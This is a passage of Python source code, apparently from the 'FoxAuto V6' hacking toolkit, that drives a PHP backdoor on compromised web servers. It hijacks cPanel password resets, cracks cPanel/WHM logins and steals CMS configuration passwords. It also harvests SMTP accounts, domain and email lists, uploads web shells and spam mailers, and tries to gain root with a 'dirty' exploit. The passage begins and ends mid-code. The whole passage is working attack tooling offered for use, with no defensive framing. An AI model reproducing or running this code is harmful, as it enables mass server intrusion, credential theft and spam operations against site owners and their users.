post0 = {'resetlocal': token, 'get3': 'get3', 'token':t, 'act':'AnonymousFox'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post0, headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post0, headers=headers, timeout=30)
check = content_Fox(check)
if ('Error-one' in check):
print(' {}[-] There is no cPanel.'.format(fr))
elif ('Error-two' in check):
print(' {}[-] Reset Password Disabled.'.format(fr))
elif ('<cpanel>' in check):
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
src = str(changemail_Fox())
email = re.findall(re.compile('\'(.*)\', <RequestsCookieJar'), src)[0]
cookies = re.findall(re.compile('name=\'PHPSESSID\', value=\'(.*)\', port='), src)[0]
post1 = {'email': email, 'get': 'get'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post1,headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post1, headers=headers, timeout=30)
time.sleep(10)
code = checkinbox(cookies, email)
start = timer()
while ((code == 'AnonymousFox') and ((timer() - start) < 90)):
time.sleep(30)
code = checkinbox(cookies, email)
if (code == 'AnonymousFox') :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
else :
post2 = {'code': code, 'get2': 'get2'}
try :
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
except:
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
check2 = content_Fox(check2)
if ('<cpanel>' in check2) :
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check2)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check2)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
except :
print(' {}[-] Reset Password Failed\n {}[!] Try {}[Semi-Automatic]'.format(fr, fw, fr))
open('Results/Try_Rest_cPanel_Semi_Automatic.txt', 'a').write('{}\n'.format(urlShell))
def resetPassword2(backdor, urlShell, email) :
try :
print(' {}[*] Reset Password ..... {}(Waiting)'.format(fw, fr))
post = {'email': email, 'get': 'get'}
try :
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
check = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
check = content_Fox(check)
if ('Error-one' in check):
print(' {}[-] There is no cPanel.'.format(fr))
elif ('Error-two' in check):
print(' {}[-] Reset Password Disabled.'.format(fr))
elif ('./Done' in check):
print(' {}[+] The system sent the security code to your email.'.format(fg))
code = str(input_Fox(' {}[!] Enter the security code:{} '.format(fw, fr))).strip()
if(code == ''):
print(' {}[-] The code is wrong.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
return
post2 = {'code': code, 'get2': 'get2'}
try :
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except:
check2 = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
check2 = content_Fox(check2)
if ('<cpanel>' in check2):
cpanelRt = re.findall(re.compile(':2083\|(.*)</cpanel>'), check2)[0]
domain = re.findall(re.compile('https://(.*):2083\|'), check2)[0]
print(' {}[+] Succeeded.\n - {}https://{}:2083|{}'.format(fg, fr, domain, cpanelRt))
open('Results/cPanel_Reset.txt', 'a').write('https://{}:2083|{}'.format(domain, cpanelRt) + '\n')
else :
print(' {}[-] Reset Password Failed.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
except:
print(' {}[-] Reset Password Failed.'.format(fr))
open('Results/Try_Rest_cPanel_manually.txt', 'a').write('{}\n'.format(urlShell))
def finderSMTP(backdor) :
try :
post = {'finderSMTP': 'AnonymousFox'}
print(' {}[*] Finder SMTP ..... {}(Waiting)'.format(fw, fr))
try :
finderSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
finderSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
finderSMTP = content_Fox(finderSMTP)
if ('Error-SMTP' in finderSMTP) :
print(' {}[-] Another hacker has already withdraw it.'.format(fr))
elif ('<findersmtp>' in finderSMTP) :
if (re.findall(re.compile('<findersmtp>(.*)</findersmtp>'), finderSMTP)):
SMTPs = re.findall(re.compile('<findersmtp>(.*)</findersmtp>'), finderSMTP)
print(' {}[+] Succeeded'.format(fg))
for SMTP in SMTPs:
if ('!!' in SMTP) :
SMTP = SMTP.replace("!!", "@")
print(' {}- {}{}'.format(fg, fr, SMTP))
open('Results/SMTPs.txt', 'a').write(SMTP + '\n')
else :
print(' {}[-] There is no SMTP.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getSMTP(backdor) :
try :
post = {'getSMTP': 'AnonymousFox'}
print(' {}[*] Create SMTP ..... {}(Waiting)'.format(fw, fr))
try :
getSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
getSMTP = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
getSMTP = content_Fox(getSMTP)
if ('<smtp>' in getSMTP) :
smtpC = re.findall(re.compile('<smtp><domain>Domian => (.*)</domain><port><br>Port => (.*)</port><smtpname><br>SMTPname => (.*)</smtpname><password><br>Password => (.*)</password></smtp>'),getSMTP)[0]
smtp = '{}|{}|{}@{}|{}'.format(smtpC[0], smtpC[1], smtpC[2], smtpC[0], smtpC[3])
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, smtp))
open('Results/SMTPs_Create.txt', 'a').write(smtp + '\n')
else :
print(' {}[-] There is no WebMail.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def finderScript(backdor, shell) :
try :
print(' {}[*] Finder Script ..... {}(Waiting)'.format(fw, fr))
post = {'pwd': 'AnonymousFox'}
try :
srcServerFox = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
srcServerFox = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
srcServerFox = content_Fox(srcServerFox)
uname = re.findall(re.compile('<uname><font color="red"><center>(.*)</center> </font><br></uname>'), srcServerFox)[0]
pwd = re.findall(re.compile('<pwd><font color="blue"><center>(.*)</center></font><br></pwd>'), srcServerFox)[0]
print(' {}[U] '.format(fm) + uname)
print(' {}[P] '.format(fm) + pwd)
open('Results/pwd_uname_servers.txt', 'a').write('{}\n{}\n{}\n-----------------------------------------------------------------------------------------------------\n'.format(uname, pwd, shell))
if ('[-] Windows' in srcServerFox):
print(' {}[S] Windows server.'.format(fr))
open('Results/Windows_servers.txt', 'a').write('{}\n'.format(shell))
else:
print(' {}[S] Linux server.'.format(fg))
if (' 2015 ' in uname or ' 2014 ' in uname or ' 2013 ' in uname or ' 2012 ' in uname or ' 2011 ' in uname or ' 2010 ' in uname) :
open('Results/Roots_servers.txt', 'a').write('{}\n'.format(shell))
elif (' 2016 ' in uname):
if (' Dec ' not in uname and ' Nov ' not in uname):
open('Results/Roots_servers.txt', 'a').write('{}\n'.format(shell))
if ('[+] cPanel' in srcServerFox):
print(' {}[+] cPanel script.'.format(fg))
open('Results/cPanels_servers.txt', 'a').write('{}\n'.format(shell))
elif ('[+] vHosts' in srcServerFox):
print(' {}[+] vHosts script.'.format(fg))
open('Results/vHosts_servers.txt', 'a').write('{}\n'.format(shell))
except:
print(' {}[-] Failed.'.format(fr))
def accesshash(backdor, shell) :
try:
print(' {}[*] Accesshash + .my.cnf ..... {}(Waiting)'.format(fw, fr))
post = {'acc': 'AnonymousFox'}
try :
checkacc = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
checkacc = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
checkacc = content_Fox(checkacc)
if ('[+] Accesshash' in checkacc) :
print(' {} -{} {} => {}[{}Accesshash{}]'.format(fr, fg, shell, fr, fg, fr))
open('Results/accesshash.txt', 'a').write('{}?php={}/_@files/php/accesshash.txt\n'.format(backdor, dom))
exploitAcesshash(backdor)
else :
print(' {} - {} => [Not Found Accesshash]'.format(fr, shell))
if ('[+] mycnf' in checkacc) :
print(' {} -{} {} => {}[{}Mycnf{}]'.format(fr, fg, shell, fr, fg, fr))
open('Results/mycnf.txt', 'a').write('{}?php={}/_@files/php/mycnf.txt\n'.format(backdor, dom))
else :
print(' {} - {} => [Not Found Mycnf]'.format(fr, shell))
except:
print(' {}[-] Failed.'.format(fr))
def getConfig(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-C/', 1)
post = {'config': 'AnonymousFox'}
print(' {}[*] Trying get Config ..... {}(Waiting)'.format(fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=180)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=240)
getConfig = content_Fox(getConfig)
if ('Error-Config' in getConfig) :
print(' {}[-] CageFS (CloudLinux).'.format(fr))
sh_path = getConfigCFS(backdor, shell)
if (sh_path is False) :
return False
else :
return sh_path
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript(backdor, sh_path, shell))
if (getscript_str == 'Problem101') :
print(' {}[-] Please , Check form this manually'.format(fr))
return False
elif (getscript_str == 'Problem404') :
print(' {}[-] 404 Config.'.format(fr))
sh_path = getConfig404(backdor, shell)
if (sh_path is False):
return False
else :
return sh_path
else :
print(getscript_str)
return sh_path
else :
print(' {}[-] Failed.'.format(fr))
return False
except:
print(' {}[-] Failed.'.format(fr))
return False
def getConfig404(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-C404/', 1)
post = {'config404': 'AnonymousFox'}
print(' {}[*] Trying get config{}404{} ..... {}(Waiting)'.format(fw, fr, fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=180)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=240)
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript404(backdor, sh_path, shell))
print(getscript_str)
if ('There is no Config.' not in getscript_str) :
return sh_path
else :
return False
else :
print(' {}[-] Failed.'.format(fr))
return False
except:
print(' {}[-] Failed.'.format(fr))
return False
def getConfigCFS(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-CCFS/', 1)
post = {'configCFS': 'AnonymousFox'}
print(' {}[*] Trying get config{}CFS{} ..... {}(Waiting)'.format(fw, fg, fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript(backdor, sh_path,shell))
if (getscript_str == 'Problem101') :
print(' {}[-] Please , Check form this manually.'.format(fr))
return False
elif (getscript_str == 'Problem404') :
print(' {}[-] There is no Config.'.format(fr))
return False
else :
print(getscript_str)
return sh_path
else :
print(' {}[-] Failed.'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def getscript(backdor, config, shell) :
rz = 'Problem404'
try :
post = {'dir': config, 'getPasswords': 'AnonymousFox'}
try:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
getScript = content_Fox(getScript)
if ('Problem101' in getScript):
rz = 'Problem101'
elif ('Problem404' in getScript) :
rz = 'Problem404'
elif ('<password>' in getScript):
if (re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)):
countWP = int(re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)[0])
else :
countWP = 0
if (re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)):
countJM = int(re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)[0])
else :
countJM = 0
if (re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)):
countOC = int(re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)[0])
else :
countOC = 0
rz = ' {}[+] Found {}{}{} WordPress Config, {}{}{} Joomla Config, {}{}{} OpenCart Config'.format(fg, fr, countWP, fg, fr, countJM, fg, fr, countOC, fg)
open('Results/Configs.txt', 'a').write('Shell => {}\nConfig => {}\n[+] Found {} WordPress Config , {} Joomla Config , {} OpenCart Config\n-----------------------------------------------------------------------------------------------------\n'.format(shell, config, countWP, countJM, countOC))
else :
rz = 'Problem404'
return rz
except:
return rz
def getscript404(backdor, config, shell) :
rz = ' {}[-] There is no Config.'.format(fr)
try :
post = {'dir': config, 'getPasswords': 'AnonymousFox'}
try:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
getScript = content_Fox(getScript)
if ('<password>' in getScript):
if (re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)):
countWP = int(re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)[0])
else :
countWP = 0
if (re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)):
countJM = int(re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)[0])
else :
countJM = 0
if (re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)):
countOC = int(re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)[0])
else :
countOC = 0
rz = ' {}[+] Found {}{}{} WordPress Config, {}{}{} Joomla Config, {}{}{} OpenCart Config'.format(fg, fr, countWP, fg, fr, countJM, fg, fr, countOC, fg)
open('Results/Configs.txt', 'a').write('Shell => {}\nConfig => {}\n[+] Found {} WordPress Config , {} Joomla Config , {} OpenCart Config\n-----------------------------------------------------------------------------------------------------\n'.format(shell, config, countWP, countJM, countOC))
else :
rz = ' {}[-] There is no Config.'.format(fr)
return rz
except:
return rz
def getConfigPasswords_cPanelcracker(backdor, config) :
try:
print(' {}[*] Get Passwords/cPanel-WHM Crack ..... {}(Waiting)'.format(fw, fr))
post = {'dir':config, 'getPasswords':'AnonymousFox'}
post2 = {'getUser': 'AnonymousFox'}
try:
getPassword = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=300)
except:
getPassword = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=360)
getPassword = content_Fox(getPassword)
try :
getUsername = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except:
getUsername = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
getUsername = content_Fox(getUsername)
if ('<password>' in getPassword) :
if (re.findall(re.compile('<br><password>(.*)</password>'), getPassword)):
passwords = re.findall(re.compile('<br><password>(.*)</password>'),getPassword)
passwordsTXT = ''
if (re.findall(re.compile('<user>(.*)</user>'), getUsername)):
usernames = re.findall(re.compile('<user>(.*)</user>'),getUsername)
usernamesTXT = ''
for password in passwords:
passwordsTXT = passwordsTXT + str(password) + '\n'
for username in usernames:
usernamesTXT = usernamesTXT + str(username) + '\n'
post = {'passwords':passwordsTXT, 'usernames':usernamesTXT, 'crackCP':'AnonymousFox'}
try :
cPanelcracker = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
cPanelcracker = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=1000)
cPanelcracker = content_Fox(cPanelcracker)
if ('<center><font color=blue>You Found 0 cPanel' in cPanelcracker) :
print(' {}[-] Found 0 cPanel.'.format(fr))
else :
n = re.findall(re.compile('<center><font color=blue>You Found (.*) cPanel \(Cracker\)</font></center>'), cPanelcracker)[0]
if (re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b><reseller> Password : <b><font color=red>(.*)</reseller></font></b><br/></center>'), cPanelcracker)):
cpanelsRs = re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b><reseller> Password : <b><font color=red>(.*)</reseller></font></b><br/></center>'), cPanelcracker)
if (re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b> Password : <b><font color=red>(.*)</font></b><br/></center>'), cPanelcracker)):
cpanels = re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b> Password : <b><font color=red>(.*)</font></b><br/></center>'),cPanelcracker)
print(' {}[+] Found {} cPanel.'.format(fg, n))
if ('cpanels' in locals()):
for cpanel in cpanels:
cp ='https://'+cpanel[0]+':2083|'+cpanel[1]+'|'+cpanel[2]
if ('amp;' in cp):
cp = cp.replace('amp;', '')
print(' {} - {}{}'.format(fg, fr, cp))
open('Results/cPanelCrack.txt', 'a').write(cp + '\n')
if ('cpanelsRs' in locals()):
for cpanelsR in cpanelsRs:
cp = 'https://' + cpanelsR[0] + ':2083|' + cpanelsR[1] + '|' + cpanelsR[2]
if ('amp;' in cp):
cp = cp.replace('amp;', '')
print(' {} - {}{} [{}Reseller{}]'.format(fr, fg, cp, fr, fg))
open('Results/cPanelCrack.txt', 'a').write(cp + '\n')
cpRs = cp.replace(':2083', ':2087')
open('Results/reseller.txt', 'a').write(cpRs + '\n')
exploitWHM(backdor, cpanelsRs)
else :
print(' {}[-] Please , Check form this manually.'.format(fr))
except:
print(' {}[-] Please , Check form this manually.'.format(fr))
def getRoot(backdor, shell):
try :
post = {'getRoot': 'AnonymousFox'}
post2 = {'checkRoot': 'AnonymousFox'}
print(' {}[*] Trying get Root ..... {}(Waiting)'.format(fw, fr))
try :
getRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=60)
getRoot = content_Fox(getRoot)
except :
getRoot = ''
if ('Error2-Root' in getRoot) :
print(' {}[-] It doesn\'t work with ./dirty.'.format(fr))
return
time.sleep(15)
try :
checkRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except :
checkRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
checkRoot = content_Fox(checkRoot)
if ('<root>' in checkRoot) :
ip = re.findall(re.compile('<root><ip>IP => (.*)</ip>'), checkRoot)[0]
print(' {}[+] Succeeded.\n - {} IP: {} | PORT: 22 | USERNAME: root | PASSWORD: 0'.format(fg, fr, ip))
print(' {}[!] Note 1: Port 22, It is the default port, If it does not work, Execute: [{}netstat -lnp --ip{}]'.format(fw, fr, fw))
print(' {}[!] Note 2: It is best to wait 5 minutes before trying to log in.'.format(fw))
open('Results/root.txt', 'a').write('{}\n{}|22|root|0\n-----------------------------------------------------------------------------------------------------\n'.format(shell, ip))
else :
print(' {}[-] It didn\'t work with ./dirty.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getDomains(backdor):
try :
post = {'getDomains': 'AnonymousFox'}
print(' {}[*] Trying get Domains ..... {}(Waiting)'.format(fw, fr))
try :
getDomains = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
except :
getDomains = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=45)
getDomains = content_Fox(getDomains)
if ('<ip>' in getDomains) :
ip = re.findall(re.compile('<ip>(.*)</ip>'), getDomains)[0]
print(' {}[+] Saved in {}Results/Domains_lists/{}.txt'.format(fg, fr, ip))
strrings = ['<ip>{}</ip>'.format(ip), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings :
if (s in getDomains):
getDomains = getDomains.replace(s, "")
patheListDomains = r'Results/Domains_lists'
if (not os.path.exists(patheListDomains)):
os.makedirs(patheListDomains)
open('Results/Domains_lists/{}.txt'.format(ip), 'w').write(getDomains)
open('Results/Domains_lists/0.0.0.0.All_Domains.txt', 'a').write(getDomains)
else :
print(' {}[-] Failed.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getMails(backdor):
try :
post = {'getMails': 'AnonymousFox'}
post2 = {'checkList': 'AnonymousFox'}
print(' {}[*] Trying get Mails ..... {}(Waiting)'.format(fw, fr))
try :
getMails = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=1080)
getMails = content_Fox(getMails)
except :
getMails = getMails = ''
if ('<badconfig>' not in getMails) :
time.sleep(30)
try :
checkList = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
checkList = content_Fox(checkList)
except:
checkList = ''
if ("<domain>" in checkList) :
domain = re.findall(re.compile('<domain>(.*)</domain>'), checkList)[0]
print(' {}[+] Saved in {}Results/Emails_lists/{}_Single.txt'.format(fg, fr, domain))
strrings = ['<domain>{}</domain>'.format(domain), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings:
if (s in checkList):
checkList = checkList.replace(s, "")
patheListEmails = r'Results/Emails_lists'
if (not os.path.exists(patheListEmails)) :
os.makedirs(patheListEmails)
open('Results/Emails_lists/{}_Single.txt'.format(domain), 'w').write(checkList)
open('Results/Emails_lists/0.0.0.0.All_Mails.txt', 'a').write(checkList + '\n')
else :
print(' {}[-] There is no Email.'.format(fr))
else :
print(' {}[-] There is no Config.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def MassGetMails(backdor, config):
try :
post = {'dir' : config, 'MassGetMails': 'AnonymousFox'}
post2 = {'checkList': 'AnonymousFox'}
print(' {}[*] Trying get Mails ..... {}(Waiting)'.format(fw, fr))
try :
getMails = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=2160)
getMails = content_Fox(getMails)
except :
getMails = ''
if ('<badconfig>' not in getMails) :
time.sleep(60)
try :
checkList = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
checkList = content_Fox(checkList)
except:
checkList = ''
if ("<domain>" in checkList) :
domain = re.findall(re.compile('<domain>(.*)</domain>'), checkList)[0]
print(' {}[+] Saved in {}Results/Emails_lists/{}_Configs.txt'.format(fg, fr, domain))
strrings = ['<domain>{}</domain>'.format(domain), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings:
if (s in checkList):
checkList = checkList.replace(s, "")
patheListEmails = r'Results/Emails_lists'
if (not os.path.exists(patheListEmails)) :
os.makedirs(patheListEmails)
open('Results/Emails_lists/{}_Configs.txt'.format(domain), 'w').write(checkList)
open('Results/Emails_lists/0.0.0.0.All_Mails.txt', 'a').write(checkList + '\n')
else :
print(' {}[-] There is no Email.'.format(fr))
else :
print(' {}[-] There is no Config.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def uploadMailer(backdor, leafMailer):
try:
print(' {}[*] Upload Leaf PHPMailer ..... {}(Waiting)'.format(fw, fr))
mailer_pass = random_Fox(10)
leafMailer = file_get_contents_Fox(leafMailer)
mailer_text = leafMailer.replace("AnonymousFox", mailer_pass)
filename = random_Fox(10) + '.php'
mailer_path = shellPath_Fox(backdor, filename, 1)
filedata = {'upload': 'upload'}
fileup = {'file': (filename, mailer_text)}
try :
upMailer = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=45)
except:
upMailer = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=60)
if (upMailer.status_code != 403 and 'WORKING' in testSendA) :
print(' {}[+] Succeeded.\n - {}{}?pass={}'.format(fg, fr, mailer_path, mailer_pass))
open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}?pass={}\n'.format(mailer_path, mailer_pass))
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def uploadFile(backdor, srcShell, tyShell = 1) :
try:
if (tyShell > 5) :
print(' {}[*] Upload File ..... {}(Waiting)'.format(fw, fr))
if (tyShell == 4 or tyShell == 9) :
mailer_pass = random_Fox(10)
srcShell = file_get_contents_Fox(srcShell)
srcShell = srcShell.replace("AnonymousFox", mailer_pass)
else:
srcShell = open(srcShell, 'rb')
filename = random_Fox(10) + '.php'
if (tyShell == 4 or tyShell == 9) :
file_path = shellPath_Fox(backdor, filename, 1) + '?pass={}'.format(mailer_pass)
else :
file_path = shellPath_Fox(backdor, filename, 1)
post = {'upload': 'upload'}
fileup = {'file': (filename, srcShell)}
try :
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
if (upFile.status_code != 403 and 'FoxAuto' in checkups) :
print(' {}[+] Succeeded Upload.\n - {}{}'.format(fg, fr, file_path))
if (tyShell == 4 or tyShell == 9):
open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}\n'.format(file_path))
else :
print(' {}[+] Saved in {}Results/Shells.txt'.format(fg, fr))
open('Results/Shells.txt', 'a').write('{}\n'.format(file_path))
else:
print(' {}[-] Failed Upload.'.format(fr))
except :
print(' {}[-] Failed Upload.'.format(fr))
def uploadFileMain(backdor, file, tyShell = 1) :
try :
if (tyShell > 5):
print(' {}[*] Upload File ..... {}(Waiting)'.format(fw, fr))
if (tyShell == 4 or tyShell == 9) :
mailer_pass = random_Fox(10)
file = file_get_contents_Fox(file)
file = file.replace("AnonymousFox", mailer_pass)
else:
srcShell = open(file, 'rb')
post = {'up': 'up'}
filename = random_Fox(10) + '.php'
fileup = {'file': (filename, file)}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourfile>(.*)</yourfile>'), upFile)[0]
if (tyShell == 4 or tyShell == 9):
file_path = file_path + '?pass={}'.format(mailer_pass)
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
if (tyShell == 4 or tyShell == 9):
